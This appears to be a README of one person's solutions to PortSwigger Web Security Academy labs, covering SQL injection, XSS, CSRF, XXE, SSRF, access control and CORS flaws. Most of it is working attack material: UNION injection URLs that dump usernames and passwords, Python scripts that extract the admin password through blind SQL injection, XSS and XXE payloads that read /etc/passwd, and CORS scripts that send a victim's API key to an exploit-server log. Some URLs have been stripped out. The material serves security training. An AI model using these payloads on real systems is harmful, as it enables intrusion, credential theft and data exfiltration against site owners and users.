Skip to content

Latest commit





Folders and files

Last commit message
Last commit date

parent directory


Web Security Academy solutions



SQL injection UNION attack, determining the number of columns returned by the query

  1. Initial request: GET /filter?category=Food+%26+Drink
  2. Guess: SELECT name, price FROM products WHERE category='[input]'
  3. SQL query attempts:
    • /filter?category='+ORDER+BY+3--
    • /filter?category='+UNION+SELECT+id,name,price+FROM+products--
  4. Just had to return an additional row containing null values.

SQL injection UNION attack, finding a column containing text

  • /filter?category=Corporate+gifts'+UNION+SELECT+price,null,null+FROM+products--
  • /filter?category=Corporate+gifts'+UNION+SELECT+1337,table\_name,null+FROM+information\_schema.tables--
  • /filter?category='+UNION+SELECT+null,column\_name,null+FROM+information\_schema.columns+WHERE+table\_name='products'--
  • /filter?category='+UNION+SELECT+null,'0tb9ew',null+FROM+products-- :/

SQL injection UNION attack, retrieving data from other tables

  • /filter?category=Gifts'+ORDER+BY+2--
  • /filter?category=Gifts'+union+select+username,password+from+users--

SQL injection UNION attack, retrieving multiple values in a single column


SQL injection attack, querying the database type and version on Oracle


SQL injection attack, querying the database type and version on MySQL and Microsoft


SQL injection attack, listing the database contents on non-Oracle databases

  • /filter?category='+union+select+version(),null--
  • /filter?category='+union+select+table\_name,null+from+information\_schema.tables--
  • /filter?category='+union+SELECT+null,column\_name+FROM+information\_schema.columns+WHERE+table\_name='users\_tgviyo'--
  • /filter?category='+union+SELECT+username\_bzrpfl,password\_mignev+from+users\_tgviyo--

SQL injection attack, listing the database contents on Oracle

  • /filter?category='+union+select+null,table\_name+from+all\_tables--
  • /filter?category='+union+select+null,column\_name+from+all\_tab\_columns+where+table\_name='USERS\_QCHNKE'
  • /filter?category='+union+select+USERNAME\_NREBWP,PASSWORD\_TKLBZQ+from+USERS\_QCHNKE--

Blind SQL injection with conditional responses

Wrote a script to compare substring and check reponse text.

import string
import requests

uid = 'ac751fda1f68ed5880244a8b00b300bb'
url = 'https://' + uid + ''

# SUBSTRING(str, pos, len)
# cookies = {'TrackingId':"QXEw7ba7drmk8bb9' UNION SELECT version()--;"}

k = ''

for j in range(1,50):
    for i in string.printable:
        payload = "' UNION SELECT password FROM users WHERE username='administrator' AND SUBSTRING(password,1,"+str(j)+")='"+(k+i)+"'--"
        cookies = {'TrackingId':'xyz' + payload}
        r = requests.get(url, cookies=cookies)
        if 'Welcome back!' in r.text:
            k += i

# l8we30kf7sp3t16i04co

Blind SQL injection with conditional errors ⭐

Similar to conditional responses.

import string
import requests

uid = 'ac871f601e7effe9807ad5e0004e008a'
url = 'https://' + uid + ''

# oracle db
# no error if no rows returned
# first find length of password
# pwd: uney5hpoi974385dhpdp

pwd = ''

for j in range(1,50):
    for i in string.printable:
        cookies = {'TrackingId':"xyz' union select case when (username='administrator' and substr(password,1,"+str(j)+") = '"+(pwd+i)+"') then to_char(1/0) else null end from users--"}
        response = requests.get(url,cookies=cookies)
        if 'Error' in response.text:
            pwd += i

Blind SQL injection with time delays ⭐

Doesn't work:

  • Cookie: TrackingId=' or pg_sleep(10)--;
  • Cookie: TrackingId=' union select pg_sleep(10)--;

Intended solution: Cookie: TrackingId=' || pg_sleep(10)--;

Blind SQL injection with time delays and information retrieval

import time
import string
import requests

uid = 'ac701f261e608c7180d738b8001800f5'
url = 'https://' + uid + ''
pwn = '' # 09tcmzjn1trwj0m2y7gs

for j in range(1,100):
    for i in string.printable:
        cookies = {"TrackingId":"x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1," + str(j) + ")='" + (pwn+i) + "')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--"}

        start = int(time.time())
        resp = requests.get(url, cookies=cookies)
        end = int(time.time())

        if end - start >= 10:
            pwn += i

Blind SQL injection with out-of-band interaction

Requires Burp Suite Professional.

Blind SQL injection with out-of-band data exfiltration

Requires Burp Suite Professional.

SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

/filter?category=' or 1=1--

SQL injection vulnerability allowing login bypass

Entered this in the username field administrator'--


Reflected XSS into HTML context with nothing encoded

Search bar <img src=x onerror=alert(1)>

Reflected XSS into HTML context with most tags and attributes blocked

<h1>0 search results for 'asdf'</h1>

  • <script>alert(document.cookie)</script> tags not allowed.
  • alert(document.cookie) is not blocked.
  • <> tags not allowed.
  • No URL encoding.

Couldn't figure it out after a long time, so looked at the solution.

  • Use Burp to intercept search request.
  • Send request to Intruder.
  • Copy payloads from cheat sheet.
  • Saw that <body> returned 200.
  • Copy events from cheat sheet.
  • <body resize=1> returned 200.
  • But, we need to resize the body to trigger the payload.
  • Therefore, change width onload.
<iframe src=""'100px'>

Reflected XSS into HTML context with all tags blocked except custom ones

Intended solution:

location = '<xss id=x onfocus=alert(document.cookie) tabindex=1>#x';

Reflected XSS with event handlers and href attributes blocked ⭐

I first checked all the tags that are allowed using this script.


Then after modifying a payload from here I got a working payload: <svg><a xmlns:xlink=><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>

Intended solution (which didn't work for me for some reason): <svg><a><animate+attributeName=href+values=javascript:alert(1)+/><text+x=20+y=20>Click me</text></a>

Reflected XSS with some SVG markup allowed TBD

First I checked all the tags allowed using this script.


Then I check all the events allowed using the same script.


The only payload using the above event handler was: <svg><animate onbegin=alert(1) attributeName=x dur=1s> but it has animate which is disallowed.

I then try to draw a basic circle using <svg> which works:

<svg width="100" height="100">
  <circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />

But tags like <script> are diassallowed. So I pulled all tags that are usually used in <svg> and ran the same script to see which ones were allowed.

  • Then I looked into this presentation.
  • Also, this doesn't show "Tag not allowed": <svg><.*></svg>

Reflected XSS into attribute with angle brackets HTML-encoded

" autofocus onfocus="alert(1)

Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped


Stored XSS into anchor href attribute with double quotes HTML-encoded

In website textbox put: javascript:alert(1)

Reflected XSS in canonical link tag TBD

<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Reflected XSS into a JavaScript string with single quote and backslash escaped TBD

var searchTerms = 'asdf';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
encodeURIComponent() escapes all characters except: `A-Z a-z 0-9 - _ . ! ~ * ' ( )`

'-alert(0)-' => var searchTerms = '\'-alert(0)-\''; => <img src="?searchTerms='-alert(1)-'">
"-alert(1)-" => var searchTerms = '"-alert(1)-"'; => <img src="?searchTerms=%22-alert(1)-%22">
%00" => var searchTerms = '�"'; => <img src="?searchTerms=%EF%BF%BD%22">\_Objects/encodeURIComponent

Reflected XSS into a JavaScript string with angle brackets HTML encoded

'; alert(1);//

Stored XSS into HTML context with nothing encoded

Comment <img src=x onerror=alert(1)>

DOM XSS in document.write sink using source

The sink and source are in embedded javascript within the search page.

function trackSearch(query) {
    document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
var query = (new URLSearchParams('search');
if(query) {

Using this payload x"><script>alert(1)</script><img src="x the document.write will look like:

<img src="/resources/images/tracker.gif?searchTerms=x"><script>alert(1)</script><img src="x">

Intended solution "><svg onload=alert(1)>

DOM XSS in innerHTML sink using source

function doSearchQuery(query) {
    document.getElementById('searchMessage').innerHTML = query;
var query = (new URLSearchParams('search');
if(query) {

My solution: /?search=<svg%20onload=alert(1)>

DOM XSS in jQuery anchor href attribute sink using source

Searched for $(' and found:

$(function() {
    $('#backLink').attr("href", (new URLSearchParams('returnPath'));

My solution: /feedback?returnPath=javascript:alert(1)


CSRF vulnerability with no defenses

<form id="login-form" action="" method="POST">
<input required type="email" name="email" value="">


CSRF where token validation depends on request method

Change POST to GET and shift parameters to url.

location = '';

CSRF where token validation depends on token being present

<form action="" method="POST" id="myForm">
<input name="email" value="blah">


CSRF where token is not tied to user session

Go to the change-email page of any user and copy the anti-CSRF token.

<form action="" method="POST" id="myForm">
<input name="email" value="blah">
<input name="csrf" value="m2NgsCKWkrWIr7BhsoHIL2aO84QW79FK">



Exploiting XXE using external entities to retrieve files

<?xml version="1.0"?>
    <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

Exploiting XXE to perform SSRF attacks

<?xml version="1.0"?>
    <!DOCTYPE root [<!ENTITY xxe SYSTEM "">]>


Basic SSRF against the local server

  • First change the request parameter to: stockApi=http://localhost/admin
  • Then stockApi=http://localhost/admin/delete?username=carlos

Basic SSRF against another back-end system

First run this script to get the IP of the backend system.

import requests

uid = 'ac701fa31f5c386580184a1500cc00a6'
url = 'https://' + uid + ''

for i in range(2,256):
    data = {'stockApi':'http://192.168.0.'+str(i)+':8080/admin'}
    response =,data=data)

    if 'Could not connect to external stock check service' not in response.text: break;

Then change the request parameter as follows: stockApi=

Finally to delete a user: stockApi=

SSRF with blacklist-based input filter

  • To bypass blacklist: stockApi=http://127.1/adMin
  • To delete: stockApi=http://127.1/adMin/delete?username=carlos

OS Command Injection

OS command injection, simple case


Blind OS command injection with time delays


Blind OS command injection with output redirection


Blind OS command injection with out-of-band interaction

Requires Burp Suite Professional.

Blind OS command injection with out-of-band data exfiltration

Requires Burp Suite Professional.

Access Control

Unprotected admin functionality: robots.txt
Unprotected admin functionality with unpredictable URL: view source => js to check admin => /admin-uhsegl
User role controlled by request paramter: login as wiener/peter => go to /admin

User role can be modified in user profile

In the POST request:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [ <!ENTITY % ext SYSTEM ""> %ext; ]>

On the exploit server:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">

URL-based access control can be circumvented

Cookie: session=FQxqrQ8PJHEBARHT7se4bxv6sqHGrQJD
X-Original-URL: /admin

Method-based access control can be circumvented

Login as wiener/peter:
PUT /admin-roles HTTP/1.1
Cookie: session=UdlpEENsbTjmMhi15gFrGZLzPJlprpTK

User ID controlled by request parameter

Login as wiener/peter:

Copy and submit the API key

User ID controlled by request parameter, with unpredictable user IDs

Login as wiener/peter:
Go to /post?postId=3, to find carlos' userId.
User that userId to get API key from My Account page.

User ID controlled by request parameter with data leakage in redirect

Login as wiener/peter
Go to /my-account?id=carlos => it redirects back to home page
Go to /my-account?id=carlos and intercept the response in Burp
Before redirection, the API key for carlos is leaked.

User ID controlled by request parameter with password disclosure

Login as wiener/peter
Go to /my-account?user=administrator
Change input type of password to text
Login as administrator/xj6efi
Delete carlos

Insecure Direct Object References

Login as wiener/peter
Go to /chat and Download Transcript
Intercept request in Burp to see that transcript is being downloaded from /download-transcript/2.txt
Go to /download-transcript/1.txt
Get carlos' password: qahe69
Login to carlos' account

Multi-step process with no access control on one step

Login as adminstrator/admin
Observe request for upgrading a user:

POST /admin-roles HTTP/1.1

Repeat the request while logged in as wiener

Referer-based access control

Login as administrator/admin
Go to /admin
Upgrade a user and intercept the request in Burp

GET /admin-roles?username=wiener&action=upgrade HTTP/1.1

Login as wiener/peter and send the request.

CORS vulnerability with basic origin reflection

  1. Login as wiener/peter
  2. Go to /my-account
  3. /my-account?id=admin is blocked
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cookie: session=RP4LxEeQbjJvfMad0sA9P4ECWmB3r99S
Access-Control-Allow-Credentials: true

Go to exploit server:

var req = new XMLHttpRequest();
req.onload = reqListener;'get','',true);
req.withCredentials = true;
req.send();function reqListener() {

Submit exploit to victim and go to /log:    2020-02-05 19:14:00 +0000 "GET /log?key={%20%20%22username%22:%20%22administrator%22,%20%20%22email%22:%20%22%22,%20%20%22apikey%22:%20%22hvhwIMzFHlIEZpEPGhdJ9EAzV06nOMmw%22} HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 PSAcademy/661765"

CORS vulnerability with trusted null origin

Send this to the victim.

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;'get','',true);
req.withCredentials = true;

function reqListener() {

Check the log    2020-02-06 19:27:31 +0000 "GET /log?key={%20%20%22username%22:%20%22administrator%22,%20%20%22email%22:%20%22%22,%20%20%22apikey%22:%20%22oyEfZl4UJC3kIc6IvycliwYYSdIwliXj%22} HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 PSAcademy/939914"

CORS vulnerability with trusted insecure protocols

var req = new XMLHttpRequest();
req.onload = reqListener;'get','',true);
req.withCredentials = true;

function reqListener() {
	location = "";

CORS vulnerability with internal network pivot attack TBD